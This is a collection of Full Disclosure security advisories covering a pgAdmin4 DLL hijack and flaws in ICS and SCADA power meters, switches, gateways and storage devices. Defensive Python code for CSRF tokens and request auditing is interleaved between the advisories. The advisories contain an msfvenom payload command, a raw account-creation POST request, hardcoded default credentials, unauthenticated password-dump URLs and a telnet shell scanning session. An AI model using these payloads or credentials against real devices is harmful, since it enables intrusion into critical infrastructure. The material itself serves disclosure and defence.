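An empty table from Get-PathDirectoryAudit means no machine PATH directory grants write rights to the listed principals; any row is a directory from which an application, like those in these advisories, would load a planted DLL.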

[FD] Python + PostgreSQL pgAdmin4 – Insecure Library Loading Allows Code Execution

2017-02-28 Thread Karn Ganeshen
Python + PostgreSQL pgAdmin4 – Insecure Library Loading Allows Code
Execution (DLL Hijacking Vulnerability)

*Confirmed on*
pgAdmin4 v1.1: Current version packaged with PostgreSQL v9.6.1.1 (Windows
x86 Current version)

*Checked on*
Windows 7 SP1 + python 2.7.13 (current version)

Note - This is a vulnerability in python which manifests via pgAdmin4.
Other applications and software that use python may be vulnerable as well.

*Download*
http://www.enterprisedb.com/postgresql-961-installers-win32?ls=Crossover&type=Crossover

*Vulnerability / Exploitation Details*

This vulnerability can allow attackers to execute arbitrary code on
vulnerable installations of pgAdmin4 software. pgAdmin4 is a GUI
application for database server administration, and comes packaged with
PostgreSQL package.

User interaction is required to exploit this vulnerability in that the
malicious dll file(s) should be saved in any of the DLL search paths.

During the course of its operations, pgAdmin4 looks for specific DLLs.
These DLLs are missing from the default application install directory; the
application then looks for them in various locations, including the
directories listed in the PATH variable, and this is where the vulnerability
arises.

Case 1 – *uuid.dll*

By placing a malicious DLL file named uuid.dll in any one of the locations
configured in the PATH variable, an attacker is able to force the process
to load an arbitrary, malicious DLL. This allows an attacker to execute
arbitrary code in the context of the (privileged) Admin user when it is
run.

Note 1: According to Dave from pgAdmin4 team –
In the case of uuid.dll, the one DLL that fails to load entirely after
exhausting Windows' search mechanism, there is also little we can do. The
search for this library is initiated entirely by the Python interpreter, not
by any of our code. *Any bug here is therefore a Python bug, not pgAdmin*.

Case 2 – *other dlls*

Multiple other dlls (system related, IMO) are also missing from the install
directories and are looked for within the pgAdmin4 installation directories.

*Steps to reproduce*

Case 1 – uuid.dll:

1. Generate a dll payload
msfvenom -p windows/exec cmd=calc.exe -f dll -o uuid.dll

2. Place this dll in any directory defined in the PATH environment
variable, e.g.

C:\app-folder-RW\
Or
C:\Windows\

3. Start pgAdmin4.exe -> calc.exe

+

___

[FD] BINOM3 Electric Power Quality Meter Vulnerabilities

2016-09-15 Thread Karn Ganeshen
*Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple
Vulnerabilities*

*About*
The meters are designed for autonomous operation in automated systems:
• SCADA systems
• Data acquisition and transmission systems
• Automated data and measurement systems for revenue and technical power
metering
• Power quality monitoring and control systems
• Automated process control systems, Management information system

+
*Submitted to ICS-CERT *- May 25, 2016.
*No response from vendor till date.*
+

*Vulnerability Information*

*HTTP*

1. *Reflected **XSS* – multiple urls, parameters
Successful exploitation of this vulnerability could allow an
unauthenticated as well as authenticated, attacker to inject arbitrary
JavaScript in a specially crafted URL request where the response containing
user data is returned to the web browser without being made safe to display.

2. *Stored **XSS* – multiple urls, parameters
Successful exploitation of this vulnerability could allow an authenticated
attacker to inject arbitrary JavaScript in specific input fields, which get
stored in the underlying db, and once accessed, the data including
malicious scripts, is returned to the web browser leading to script
execution.

3. *Weak Credentials Management *
The device comes configured with four (4) login accounts:
- admin / 1
- user / 1
- alg / 1
- telem / 1

3a) These passwords do not meet even basic security criteria.
3b) To make it even easier for attacker(s), the application design does
not provide users any option to change their own passwords in the device
management portal. Only 'root' can change passwords for all other accounts.
(AFAIK)

4.* Undocumented root account *
In addition to the above four documented login accounts, there is a 'root'
superuser account:
- root / root
- root account details are not documented in the device administration
guide or manuals
- root account has multiple, additional functions accessible like user
management

5. *Sensitive Information stored in clear-text *
- all user passwords are stored / viewable in clear-text

Additionally, specific non-root, non-privileged users can access complete
device configuration file, which contains clear-text passwords and other
config information. This flaw can be used to gain privileged access to the
device.

6. *Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

7. *Sensitive information leakage*

Every time ‘root’ logs in, a GET request is made to a specific URL to
access the password configuration file.

The response comes as XML data, and contains all accounts and their passwords.
As, by default, the management portal is configured for HTTP, a suitably
positioned attacker can sniff all login credentials, and gain privileged
access.

*Telnet*

1. *Access Control Issues*
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to the device
- Access to the device provides detailed info on application,
configuration, device file system, databases (including Energy & billing),
consumption, Statistics, network information, as well as clear-text creds
(FTP)
- Easy vector to device & data compromise

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
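The control whose absence the CSRF item above reports (a token bound to the session and to the specific sensitive function, verified on every state-changing request), as an added example that is not part of the original post or any vendor's code; the function names, the in-memory session record and the 15-minute token lifetime are this example's own assumptions.

```python
"""Per-session, per-function anti-CSRF tokens (added example, not vendor code)."""
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Server-side secret; in a real deployment it lives in protected storage, not source.
SERVER_KEY = secrets.token_bytes(32)

# Token lifetime in seconds (assumed value); stale tokens are rejected.
TOKEN_TTL = 900


class Session:
    """Minimal session record; csrf_secret is created once per login session."""

    def __init__(self, session_id: str) -> None:
        self.session_id = session_id
        self.csrf_secret = secrets.token_hex(16)


def _mac(session: Session, function: str, issued: int) -> str:
    # The MAC covers session id, per-session secret, function name and issue time,
    # so a token for 'reboot' does not verify for 'save_config', and a token
    # captured from another session does not verify at all.
    msg = f"{session.session_id}|{session.csrf_secret}|{function}|{issued}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session: Session, function: str, now: Optional[float] = None) -> str:
    """Return a token for one sensitive function, formatted <issued_at>.<hmac>."""
    issued = int(now if now is not None else time.time())
    return f"{issued}.{_mac(session, function, issued)}"


def verify_token(session: Session, function: str, token: str,
                 now: Optional[float] = None) -> bool:
    """Accept only a well-formed, unexpired token issued for this session and function."""
    try:
        issued_s, mac = token.split(".", 1)
        issued = int(issued_s)
    except (ValueError, AttributeError):
        return False
    current = int(now if now is not None else time.time())
    if issued > current or current - issued > TOKEN_TTL:
        return False
    # Constant-time compare so the MAC cannot be recovered byte by byte.
    return hmac.compare_digest(_mac(session, function, issued), mac)


def handle_post(session: Session, function: str, form: dict) -> str:
    """Gate a state-changing request: without a valid token nothing is applied."""
    if not verify_token(session, function, form.get("csrf_token", "")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: {function} applied"


if __name__ == "__main__":
    s = Session("sess-1")
    tok = issue_token(s, "save_config")
    print(handle_post(s, "save_config", {"csrf_token": tok}))  # accepted
    print(handle_post(s, "reboot", {"csrf_token": tok}))       # refused: other function
    print(handle_post(s, "save_config", {}))                   # refused: forged cross-site form
```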

[FD] ELNet Energy & Electrical Power Meter - Multiple Vulnerabilities

2016-09-08 Thread Karn Ganeshen
*ELNet Energy & Electrical Power Meter - Multiple Vulnerabilities*


http://elnet.feniks-pro.com/Elnet-LT.php

http://www.elnet.cc/product/elnet-lt/


Powermeter with color graphic display for all electrical measurements and
harmonics, with TCP/IP and RS485 communication (ModBus and Bacnet), panel
mounted 96X96 mm.


*Product Description*

General

Simple operated menus.

   - Multilingual support.
   - Up to One year of energy data logging.
   - Displays up to 64th Harmonic in Waveform or Graphic.
   - 1600 samples per cycle.
   - Accuracy 0.2 %.
   - Accuracy 0.1% with special calibration, that can be ordered.
   - Built-in T.O.U. Energy meter.
   - RS485 Communication Port (MODBUS, Bacnet MS/TP).
   - State of the art Graphic LCD
   - Modern 320 x 240 LCD display.
   - Displays of Waveform and Bar graph.
   - Simple installation- Panel mounted. Dimension: 96×96 mm.
   - Flash memory stores 6 months of energy.


   - TCP/IP communication port + WEB server
   - BacNet TCP/IP

*Standard approvals:*

IEC 62053-22, IEC 62053-23, IEC 62052-11


Large consumers of electricity e.g. factories, hotels, hospitals,
municipalities, need to know the history of their consumption and the
quality and the values of the power supply. Details such as Voltage,
Current, Power Factor, Hertz, Neutral Current, Energy consumption can be
displayed by the ELNet LT Energy & Powermeter.


An additional feature of the Powermeter is the ability to measure
Harmonics. Part of the Electricity Supply Authority’s bill reflects poor or
good Harmonics in the consumer’s system, therefore it is in his interest to
monitor Harmonics and try to improve it.


The ELNet LT Energy & Powermeter is a compact, multi-functional, three-phase
Powermeter simple to install and is especially designed to integrate into
Building Management Systems. It requires no special mounting and is ideally
suited for mounting on the front face of any standard electrical panel.


The Configuration and Setup is menu driven, with password protection.


+


*Vulnerabilities*


1. *Unauthenticated Web Management access*

ELNet power meters can be managed via Java applet over a web browser. Meter
console and all its functions are accessible.


By default, no authentication is required to access the web console.



*2. Weak Credential Management*

In order to perform certain specific functions in ELNet power meters,
passwords are required. These passwords are really just a formality.


For example:


Default password code to access Technical Menu for device configuration is –

1 (One)


*Default password – 6474*

- To reset I,V,F Peak Values

- To display /reset power peak value


+

It appears that password/code functionality is implemented for the sake of
getting the compliance check-list ticked.


Not only are the default passwords poor/weak, the system also does not have a
mechanism to enforce a mandatory password change.


3. *Password Recovery Functionality*


But what if, just what if, someone does want security and changes the
default passwords, and forgets/loses them?


According to vendor:

*It is not recommended to forget your new passwords.*


The manual doesn't seem to document Password Recovery either.


+


[FD] Multiple vulnerabilities - Powerlogic/Schneider Electric IONXXXX series Smart Meters

2016-09-08 Thread Karn Ganeshen
*Powerlogic/Schneider Electric ION series Smart Meters - Multiple
security issues*

*Impacted devices:*

*ION7300 and potentially all ION models (based off of Powerlogic)*
For example, Power Measurement Ltd. Meter ION 7330V283 ETH ETH7330V274
http://www.schneider-electric.com/download/hk/en/details/2254511-ETH-7330-V274/?reference=ETH7330V274


*About*
Power & Energy Monitoring System
Compact energy and power quality meters for feeders or critical loads

The PowerLogic ION7300 series meters help you:
• reduce energy and operations costs
• improve power quality, reliability and uptime
• optimize equipment use
for optimal management of your electrical installation and greater
productivity

Used in enterprise energy management applications such as feeder monitoring
and sub-metering, ION7300 Series meters offer unmatched value,
functionality, and ease of use. ION7300 Series meters interface to
PowerLogic StruxureWare software or other automation systems to give all
users fast information sharing and analysis.

ION7300 Series meters are an ideal replacement for analogue meters, with a
multitude of power and energy measurements, analogue and digital I/O,
communication ports, and industry-standard protocols. The ION7330 meter has
on-board data storage, emails of logged data, and an optional modem. The
ION7350 meter is further augmented by more sophisticated power quality
analysis, alarms and a call-back-on-alarm feature.

*Applications*
- Power monitoring and control operations.
- Power quality analysis.
- Cost allocation and billing.
- Demand and power factor control.
- Load studies and circuit optimisation.
- Equipment monitoring and control.
- Preventive maintenance.

*Rebranded or used as is, by different organizations*

*Canada*
Telus Mobility
Futureway Communications
Radiant Communications
Acadia University
Loyalist College
Seneca College
TBayTel

*Mexico*
Universidad Nacional Autonoma de Mexico

*USA*
Frontier Communications
Cox Communications
Avon Old Farms School
University of Pennsylvania
Princeton University
City of Glenwood Springs, Electric Department
University of California, Santa Cruz
City of Thomasville Utilities
Comcast Cable
Verizon Wireless
City Of Hartford
AT&T Internet Services
CNS-Internet
Comcast Business Communications
AT&T U-verse

*Vulnerabilities*

*HTTP Web Management portal*

Provides stats for Monitor Energy, Revenue, Peak Demand, Voltage
Disturbances.

*No access control* – by default no authentication is configured to access
the device’s web management portal.

An unauthorized user can access the device management portal and make
config changes. This can further be exploited easily at a mass scale, with
scripting, and submitting device configuration changes via a specific POST
request.

I suspect it may also be possible to cause denial of service to these
devices, as well as additional devices - which directly or indirectly
accept / send data to/from these meters - by submitting varying amounts of
invalid / junk data.

*Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

Successful exploitation of these vulnerabilities allows silent execution of
unauthorized actions on the device, specifically modifying parameter
configurations – voltage modes, polarity, voltage units, current units,
interval values – and submitting configuration changes to the meter.

*Front Panel security (Physical)*

*Weak Credential Management* – Default meter password is factory-set to
0 – mandatory default password change is not enforced.

Front panel meter security lets you configure the meter through the front
panel using a meter password.

Front panel meter security is enabled by default on all ION7300 series
meters; all configuration functions in the front panel are
password‐protected.

The password is factory‐set to 0 (zero).

*Telnet*


*Weak Credentials Management*
- *Default accounts* - different models come with corresponding login creds
- documented in the powerlogic admin guide -
http://www.powerlogic.com/literature/70072-0102-05.pdf
- Application does not enforce a mandatory default password change

For example, for ION7300, default creds are:
User - 7300
Password – 0 (<— zero)

+


[FD] CIMA DocuClass ECM - Multiple Vulnerabilities

2016-07-06 Thread Karn Ganeshen
*CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities*

DocuClass is a modular and scalable enterprise content management (ECM)
solution that allows organizations to streamline internal operations by
significantly improving the way they manage their information within a
business process.


*Vendor Response*: None


*Vulnerability Findings*

1. *SQL Injection* [Post Auth]


DocuClass web application contains a SQL injection vulnerability.


CWE-89: Improper Neutralization of Special Elements used in an SQL Command
('SQL Injection')


DocuClass web application contains a SQL injection vulnerability due to the
application failing to validate user input. Multiple parameters are
vulnerable.


*Vulnerable URLs & parameters:*

A. POST request - /dcrpcserver.php [parameter - uid]

B. GET request -

/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755

[parameter - userid]


*Impact*

An unauthenticated attacker can read or modify data in the application
database, execute code, and compromise the host system.


2. *Access Control Flaws*


DocuClass web application does not enforce strict access control.


*Impact*

An unauthenticated user can access stored documents by directly calling the
document url.


PoC:

http://IP/medical_records/001337/00123456.pdf


3. *Cross-Site Scripting*


DocuClass web application lacks strong input validation, and multiple URLs
& parameters are vulnerable to cross-site scripting (CWE-79) attacks.


*Impact*

An attacker may be able to execute arbitrary scripts/code in the context of
the user's browser.


4. *Vulnerable to Cross-Site Request Forgery*


The application does not have a CSRF Token generated per page and / or per
(sensitive) function.


*Impact*

Successful exploitation of this vulnerability can allow silent execution of
unauthorized actions in the application such as configuration changes,
(potentially) deleting stored documents, running reports, changing
passwords, filling disk space via repeated duplicate copying of documents,
etc.

+



[FD] RS232-NET Converter (JTC-200) - Multiple vulnerabilities

2016-07-06 Thread Karn Ganeshen
*RS232-NET Converter (JTC-200) - Multiple vulnerabilities*

About RS232-NET Converter (model JTC-200)
http://www.jantek.com.tw/en/product/73

*Seen deployed in:*
CHTD, Chunghwa Telecom Co., Ltd. (Taiwan)
HiNet (Taiwan & China)
PT Comunicacoes (Portugal)
Sony Network Taiwan Limited (Taiwan)
Vodafone Portugal (Portugal)

*1. Weak Credential Management*
The RS232-NET Converter (model JTC-200) web administration interface uses
non-random default credentials of admin:1234. The application does not
enforce a mandatory password change. A network-based attacker can gain
privileged access to a vulnerable device's web management interfaces or
leverage default credentials in remote attacks such as cross-site request
forgery.

*2. Unauthenticated access over Telnet (Backdoor shell possibly)*
The RS232-NET Converter (model JTC-200) provides an (undocumented) BusyBox
Linux shell over the Telnet service - without any authentication. This backdoor
shell therefore (apparently) allows access into the internal network, over
the Internet.

Trying IP...
Connected to IP.
Escape character is '^]'.

BusyBox v0.60.4 (2008.02.21-16:59+) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

#

BusyBox v0.60.4 (2008.02.21-16:59+) multi-call binary
Usage: busybox [function] [arguments]...
or: [function] [arguments]...

BusyBox is a multi-call binary that combines many common Unix  utilities
into a single executable. Most people will create a link to busybox for
each function they wish to use, and BusyBox will act like whatever it was
invoked as.

Currently defined functions:
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls,
mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi

#

# ls
bin dev etc nfs proc swap usb var
# cd etc
# ls
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc
resolv.conf services

# cat inetd.conf
telnet stream tcpnowait root /bin/telnetd
#

The BusyBox shell offers a pretty restricted set of allowed functions but it is
still possible to perform enumeration.

192.168.5.x -> real IP

# for i in `cat ip-list`; do ping 192.168.5.$i; done
192.168.5.11 is alive!
No response from 192.168.5.12
No response from 192.168.5.13
192.168.5.14 is alive!
192.168.5.15 is alive!
#

*3. Cross-Site Request Forgery (CSRF)*
The RS232-NET Converter (model JTC-200) contains a global CSRF
vulnerability. An attacker can perform actions with the same permissions as
a victim user, provided the victim has an active session and is induced to
trigger the malicious request. Note that in combination with default
credentials, an attacker can establish an active session as part of an
attack and therefore would not require a victim to be logged in.

+



[FD] EdgeCore - ES3526XA Manager - Multiple Vulnerabilities

2016-06-24 Thread Karn Ganeshen
*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -
Multiple Vulnerabilities*
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*

Object ID:
1.3.6.1.4.1.259.8.1.5

Switch Information

Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version 1.0.0.2
Boot-ROM Version 1.0.0.5
Operation Code Version 1.28.16.14

Object ID:
1.3.6.1.4.1.202.20.66

Switch Information

Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version 1.0.2.0
Boot-ROM Version 1.2.0.1
Operation Code Version 1.4.18.2
Role Master

Other firmware / software versions may also be affected.

*Vendor Response*: These models are no longer supported.

*Vulnerability Details*

*1. Weak Credentials Management*

Guest / guest – priv 0 - read privileges to most device configuration
Admin/admin – priv 15 - read/write access

*Issue:*
Mandatory password change not enforced by the application.

*2. Access Control Flaws*

Any function can be performed by directly calling the function URL
(GET/POST) without any authentication. This includes creating new
privileged user(s), changing (admin) passwords, deleting user(s),
reading/changing device configuration, rebooting the device etc.

+ Guest can also perform any administrative functions such as
add, update, delete users

*PoC 1:*
For example, anyone can access these urls directly, without any
authentication:

http://IP/config/153/sysinfo.htm?unit=1
http://IP/config/153/port_config.htm?unit=
http://IP/home/153/active_panel_bid0.htm?unit=1
http://IP/config/upnp_config.htm
http://IP/config/153/user_accounts.htm

*PoC 2:*
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166

page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=

*Issue:*
Application does not enforce access control correctly.

*3. Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, saving modified configuration, & device
reboot.

+

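A defender-side check for the access-control flaw shown in PoC 1 and PoC 2 above, written as an added example (not the author's or Edge-Core/SMC code): it parses raw HTTP requests of the shape captured in PoC 2, decodes the Basic Authorization header, and flags configuration-page access without credentials as well as account changes submitted by non-administrators. The sample requests, the admin allow-list and the path lists are constructed assumptions; the form parameter names are the ones in the PoC.

```python
"""Flag configuration-page requests the switch should have refused.

Added example; not the advisory author's or Edge-Core/SMC code. Input is a
list of raw HTTP requests as a proxy or full-request IDS would record them.
"""
import base64
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed policy: only these Basic-auth users may manage accounts.
ADMIN_USERS = {"admin"}
# Pages where a POST changes accounts or device settings (from the advisory's URLs).
SENSITIVE_PATHS = ("/config/153/user_accounts.htm", "/config/upnp_config.htm")
# Path prefixes that should never be served to a client without credentials.
PROTECTED_PREFIXES = ("/config/", "/home/")


def parse_request(raw: str) -> dict:
    """Split a raw request into method, path, lower-cased headers and body params."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # First value per key; blank values are kept so fields like txt_user_name2= stay visible.
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": urlsplit(target).path,
            "headers": headers, "params": params}


def basic_auth_user(headers: Dict[str, str]) -> Optional[str]:
    """Return the user name from an HTTP Basic Authorization header, or None."""
    scheme, _, cred = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not cred:
        return None
    try:
        decoded = base64.b64decode(cred, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    user, _, _password = decoded.partition(":")
    return user or None


def classify(req: dict) -> Optional[str]:
    """Return an alert string for a request that violates expected access control."""
    path = str(req["path"])
    user = basic_auth_user(req["headers"])
    if user is None and path.startswith(PROTECTED_PREFIXES):
        return f"unauthenticated {req['method']} to {path}"
    if req["method"] == "POST" and path in SENSITIVE_PATHS and user not in ADMIN_USERS:
        p = req["params"]
        target = p.get("txt_user_name") or p.get("sel_account", "")
        return (f"non-admin '{user}' submitted {p.get('actionType', '')} for "
                f"'{target}' with access level {p.get('sel_access_level', '')} via {path}")
    return None


def scan(raw_requests: List[str]) -> List[str]:
    """Run classify() over a batch of raw requests; alerts are returned in order."""
    return [a for a in (classify(parse_request(r)) for r in raw_requests) if a]


# Constructed sample traffic: the PoC 2 request (guest adding a level-15 user),
# an unauthenticated read of the system-info page, and a legitimate admin change.
SAMPLE_REQUESTS = [
    "POST /config/153/user_accounts.htm HTTP/1.1\r\nHost: IP\r\n"
    "Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1"
    "&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=",
    "GET /config/153/sysinfo.htm?unit=1 HTTP/1.1\r\nHost: IP\r\n\r\n",
    "POST /config/153/user_accounts.htm HTTP/1.1\r\nHost: IP\r\n"
    "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "page=userAccount&actionType=Add&sel_account=admin&txt_user_name=ops"
    "&sel_access_level=15&pswd=x&pswd_confirm=x",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print("ALERT:", alert)
```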

[FD] Sierra Wireless AirLink Raven XE Industrial 3G Gateway - Multiple Vulnerabilities

2016-06-24 Thread Karn Ganeshen
ongly recommends that best practices be followed and the Ace
Manager interface be disabled on the cellular WAN connection, particularly
when the device is active on public networks in order to prevent
exploitation of this sensitive information by internet-based attackers.

+

*4. Unauthenticated access to directories + Arbitrary File Upload*

The following directories can be accessed without any authentication:
http://IP/admin/AceManager.htm?hwstr=
http://IP:9191/admin/UpLoadTemp.htm
http://IP:9191/admin/UpLoad.htm

With access to ACEManager GUI */admin/UpLoadTemp.htm*, everyone gets access
to following options:

-> Upload, Download, Refresh options; a Reboot option is also offered now.

There is also a Logout option on this screen, indicating that we are logged in.
No other function is shown. Anyone could potentially reboot the
box. No authentication is needed.

Moving ahead.

When we make a request to http://IP:9191/admin/AceManager.htm, there are 3
GET requests made by the application:

http://IP:9191/admin/AceManager.htm
http://IP:9191/admin/UpLoadTemp.htm
http://IP:9191/admin/AceManager.htm

When we look at http://IP:9191/admin/UpLoadTemp.htm, there is no
authentication on this page, and we find it offers an option to upload a
template file, with three options -
a. Load to screen
b. Preview
c. Load & Apply

It may be possible to load a template that when loaded, modifies the
configuration and makes the device unavailable for access & usability.

Looking at the page source of /admin/UpLoadTemp.html, we find that
templates are uploaded to /Upload.

When we access http://IP:9191/admin/UpLoad.htm, there is no auth (again) on
this page, and it gives a few more options and information.

a. Any unauthenticated user can upload any file to the device
b. Arbitrary files can be uploaded via the upload form. Files get uploaded
to /
c. Uploaded files can be accessed at: http://IP/

*Affected devices:*

All Raven XE/XT models

*Comment from the vendor*: Sierra Wireless acknowledges in versions of
ALEOS compatible with the end of life Raven XE/XT family. It does not exist
in current ALEOS products. As previously noted there will be no firmware
updates to address this issue on the Raven XE/XT. Sierra Wireless strongly
recommends that the AceManager interface be disabled on the cellular WAN
connection, particularly when the device is active on public networks in
order to prevent exploitation of this sensitive information by
internet-based attackers.

+++++
-- 
Best Regards,
Karn Ganeshen



[FD] Papouch TME Temperature & Humidity Thermometers - Multiple Vulnerabilities

2016-06-16 Thread Karn Ganeshen
+
*Vulnerable Products*
1. Papouch TME Ethernet thermometer
2. Papouch TME multi: Temperature and humidity via Ethernet

*All versions affected*

*TME - Ethernet Thermometer*
http://www.papouch.com/en/shop/product/tme-ip-ethernet-thermometer/

*TME multi: Temperature and humidity via Ethernet*
http://www.papouch.com/en/shop/product/tme-multi-temperature-humidity-via-ethernet/


*Vulnerability Details*

*1. Weak Credentials Management*

The device has three security levels – user (temperature viewing),
administrator (configuration), and superadmin (sensor calibration). Each level
has its own password.

*Issue*
According to device manual, Superadmin password cannot be cleared. The
default password is 1234. This level allows you to access all settings
including sensor calibration.

-> The application does not allow/enforce a mandatory password change from
default to strong password values.


*2. Authentication Issues & Sensitive Information Leakage*

By default, password authentication is not enabled on Telnet access. Telnet
service runs on TCP . Telnet to t drops in setup mode and gives
access to device configuration.

Configuration reveals administrative password in clear-text without any
authentication. Anyone can then use this password to gain administrative
access to the device.

-> Telnet access must have authentication enabled by default, a mandatory
password change must be enforced, and any login passwords and SNMP
community strings must be hidden/masked/censored.

*3. Vulnerable to Cross-Site Request Forgery*

In Device Management portal, there is no CSRF Token generated per page and
/ or per (sensitive) function. Successful exploitation of this
vulnerability can allow silent execution of unauthorized actions on the
device such as configuration parameter changes, and saving modified
configuration.

*Overall Impact*
AFAIK, these products are typically used for monitoring temperatures in
Data Center, Fuel Tanks, Heating system monitoring, AC failure monitoring,
or performing Food / grain storage temperature monitoring etc. Therefore,
impact due to device compromise can be severe depending upon the utility &
environment where they are deployed.

+
-- 
Best Regards,
Karn Ganeshen


[FD] HP StoreEver MSL6480 Tape Library v4.10 - Multiple Vulnerabilities

2016-06-16 Thread Karn Ganeshen
*HP StoreEver MSL6480 Tape Library v4.10 - Multiple Vulnerabilities*

*Confirmed on firmware version 4.10*

*HPE PSRT response*: Upgrade to MSL6480 is 4.90 (current version)


*Weak Credentials Management*

The device comes with weak, default login credentials - security/security -
and the application does not enforce a mandatory password change from
default to strong password values.


*Access Control Issues*

An unauthenticated user can download the system configuration archive. The
archive filename can be guessed with a bit of scripting.

Filename format is as follows:

/syslog-MSL6480-A60A80---MM-DD_HH-MM-SS-SSS_.zip

For example, anyone can download the config by requesting the url:

http://IP/tmp/syslog-MSL6480-A60A80-4.10-2016-06-15_01-01-01-001_PM.zip


*Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability may allow silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, generating system configuration archive,
saving modified configuration, & device reboot.


+


-- 
Best Regards,
Karn Ganeshen



[FD] [ICS] Meteocontrol WEB’log Multiple Vulnerabilities

2016-05-17 Thread Karn Ganeshen
[ICS] Meteocontrol WEB’log Multiple Vulnerabilities

*About MeteoControl WEB’log*

Meteocontrol is a Germany-based company that maintains offices in several
countries around the world, including the US, China, Italy, Spain, France,
Switzerland, and Israel.

The affected products, WEB’log, are web-based SCADA systems that provide
functions to manage energy and power configurations in different connected
(energy/industrial) devices.

According to Meteocontrol, WEB’log is deployed across several sectors
including Commercial Facilities, Critical Manufacturing, Energy, and Water
and Wastewater Systems. Meteocontrol estimates that these products are used
primarily in Europe with a small percentage in the United States.

*Product details here:*
http://www.meteocontrol.com/en/industrial-line/data-logger-weblogs/weblog/

*Multiple versions of this application are offered:*
WEB'log Basic 100
WEB'log Light
WEB'log Pro
WEB'log Pro Unlimited

All of Meteocontrol’s WEB’log versions / flavors have the same underlying
design and are vulnerable.

This product is deployed primarily in Power & Energy domain, and is used
worldwide. It is rebranded in different countries, a few that I came across
are as follows:

   - WEB’log Pro (branded by Siemens) - US
   - Powador-proLOG (branded by KACO new energy) - Germany
   - Aurora Easy Control / Aurora Easy Control Basic (both branded by power
   one) - Italy
   - Data Control Pro (branded by Mastervolt) - France


+
*Weak Credential Management*

Default Login password is ist02
-> gives easy administrative access to anyone

Issue:
Mandatory password change is not enforced by the application.

*Access Control Flaws*
CVE-2016-2296

All pages, functions, and data can still be accessed without
administrative login. This can be achieved by directly accessing the URLs.

This includes access to configuration pages, ability to change plant data,
configured modbus/inverter devices, configuration parameters, and even
rebooting the device.

For example:
Making the following direct request dumps the source code of the page that
contains the administrator password:
http://IP/html/en/confAccessProt.html

Modbus related configuration can be dumped by calling the following url:
http://IP/html/en/confUnvModbus.html

Access Modbus devices:
http://IP/html/en/ajax/viewunvmodbus.xml

Similarly, certain POST requests can be used to Modify Plant Configuration
Data, without any authentication.

Issue:
Access control is not enforced correctly.

*Sensitive information exposure*
CVE-2016-2298

As noted above, Administrator password is stored in clear-text. So anyone
can make a request to this page and get the clear-text Administrative
password for the application, and gain privileged access.

Issue:
Password is stored in clear-text.

*Hidden/Obscured CMD shell*
CVE-2016-2297

Another interesting feature is presence of a CMD shell. Meteocontrol
WEB'log management application offers a CMD shell which allows running a
restricted set of commands that gives host, application and stats data.

And like other functions, it can be accessed directly without any
authentication -
http://IP/html/en/xprtCmd.html

Assuming no one will be able to figure out a technique to exploit this
feature is not a great idea.

*No CSRF protection - Vulnerable to CSRF attacks*
There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as modifying plant
